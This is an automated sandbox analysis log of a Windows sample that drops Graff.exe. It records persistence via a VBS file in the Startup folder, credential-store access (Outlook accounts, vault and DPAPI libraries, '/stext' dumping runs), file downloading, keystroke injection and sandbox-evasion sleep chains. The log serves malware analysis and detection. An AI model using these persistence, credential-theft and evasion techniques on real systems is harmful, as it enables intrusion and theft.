Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Process created: C:\Users\user\AppData\Local\misruling\Graff.exe C:\Users\user\AppData\Local\misruling\Graff.exe /stext "C:\Users\user\AppData\Local\Temp\wiznptnvkrevjhgaywhspkne"
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Process created: C:\Users\user\AppData\Local\misruling\Graff.exe C:\Users\user\AppData\Local\misruling\Graff.exe /stext "C:\Users\user\AppData\Local\Temp\zlegpdywxzwztnceqhblsxavxvk"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Graff.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\misruling\Graff.exe "C:\Users\user\AppData\Local\misruling\Graff.exe"
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Process created: C:\Users\user\AppData\Local\misruling\Graff.exe "C:\Users\user\Desktop\bwYw3UUfy7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Process created: C:\Users\user\AppData\Local\misruling\Graff.exe C:\Users\user\AppData\Local\misruling\Graff.exe /stext "C:\Users\user\AppData\Local\Temp\molcoacbwimigbrwpmuqe"	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Process created: C:\Users\user\AppData\Local\misruling\Graff.exe C:\Users\user\AppData\Local\misruling\Graff.exe /stext "C:\Users\user\AppData\Local\Temp\wiznptnvkrevjhgaywhspkne"	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Process created: C:\Users\user\AppData\Local\misruling\Graff.exe C:\Users\user\AppData\Local\misruling\Graff.exe /stext "C:\Users\user\AppData\Local\Temp\wiznptnvkrevjhgaywhspkne"	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Process created: C:\Users\user\AppData\Local\misruling\Graff.exe C:\Users\user\AppData\Local\misruling\Graff.exe /stext "C:\Users\user\AppData\Local\Temp\zlegpdywxzwztnceqhblsxavxvk"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\misruling\Graff.exe "C:\Users\user\AppData\Local\misruling\Graff.exe"	Jump to behavior

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe

Code function: 0_2_007342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007342DE

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_0073832D push edi; retn 0000h	0_2_0073832F
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_00750A76 push ecx; ret	0_2_00750A89
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_004567E0 push eax; ret	2_2_004567FE
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0045B9DD push esi; ret	2_2_0045B9E6
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00463EF3 push ds; retf	2_2_00463EEC
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00455EAF push ecx; ret	2_2_00455EC2
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00433FF6 push ecx; ret	2_2_00434009
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0087832D push edi; retn 0000h	2_2_0087832F
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00890A76 push ecx; ret	2_2_00890A89
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_10002806 push ecx; ret	2_2_10002819
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_01476711 push ebx; retn 006Ch	2_2_0147673D
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_0044693D push ecx; ret	4_2_0044694D
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_0044DB70 push eax; ret	4_2_0044DB84
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_0044DB70 push eax; ret	4_2_0044DBAC
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_00451D54 push eax; ret	4_2_00451D61
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_0044B090 push eax; ret	6_2_0044B0A4
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_0044B090 push eax; ret	6_2_0044B0CC
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_00451D34 push eax; ret	6_2_00451D41
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_00444E71 push ecx; ret	6_2_00444E81
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 7_2_00414060 push eax; ret	7_2_00414074
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 7_2_00414060 push eax; ret	7_2_0041409C
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 7_2_00414039 push ecx; ret	7_2_00414049
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 7_2_004164EB push 0000006Ah; retf	7_2_004165C4
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 7_2_00416553 push 0000006Ah; retf	7_2_004165C4
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 7_2_00416555 push 0000006Ah; retf	7_2_004165C4
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_004567E0 push eax; ret	10_2_004567FE
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_0045B9DD push esi; ret	10_2_0045B9E6
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00463EF3 push ds; retf	10_2_00463EEC
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00455EAF push ecx; ret	10_2_00455EC2
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00433FF6 push ecx; ret	10_2_00434009
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_017FF4C4 push 680198CFh; iretd	10_2_017FF4C9

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Code function: 2_2_00406128 ShellExecuteW,URLDownloadToFileW,

2_2_00406128

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe

File created: C:\Users\user\AppData\Local\misruling\Graff.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Graff.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Graff.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Graff.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Code function: 2_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

2_2_00419BC4

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_0074F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0074F98E
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0088F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		2_2_0088F98E

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Code function: 2_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

2_2_0041BCE3

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0040E54F Sleep,ExitProcess,		2_2_0040E54F
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_0040E54F Sleep,ExitProcess,		10_2_0040E54F

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep			graph_0-33456
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep			graph_2-87605

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Code function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,

4_2_0040DD85

Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,		2_2_004198C2
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,		10_2_004198C2

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Window / User API: threadDelayed 5846	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Window / User API: threadDelayed 3620	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Window / User API: foregroundWindowGot 1760	Jump to behavior

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_2-86724

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	API coverage: 9.6 %
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	API coverage: 9.6 %
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	API coverage: 2.0 %

Source: C:\Users\user\AppData\Local\misruling\Graff.exe TID: 7820	Thread sleep count: 254 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe TID: 7820	Thread sleep time: -127000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe TID: 7824	Thread sleep count: 5846 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe TID: 7824	Thread sleep time: -17538000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe TID: 7824	Thread sleep count: 3620 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe TID: 7824	Thread sleep time: -10860000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_0079DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0079DBBE
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	2_2_0040B335
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	2_2_0041B42F
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	2_2_0040B53A
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0044D5E9 FindFirstFileExA,	2_2_0044D5E9
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	2_2_004089A9
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00406AC2 FindFirstFileW,FindNextFileW,	2_2_00406AC2
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	2_2_00407A8C
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,	2_2_00418C69
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	2_2_00408DA7
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	2_2_100010F1
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_10006580 FindFirstFileExA,	2_2_10006580
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_0040AE51 FindFirstFileW,FindNextFileW,	4_2_0040AE51
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	6_2_00407EF8
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 7_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	7_2_00407898
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	10_2_0040B335
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	10_2_0041B42F
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	10_2_0040B53A
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_0044D5E9 FindFirstFileExA,	10_2_0044D5E9
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	10_2_004089A9
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00406AC2 FindFirstFileW,FindNextFileW,	10_2_00406AC2
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	10_2_00407A8C
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,	10_2_00418C69
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	10_2_00408DA7

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

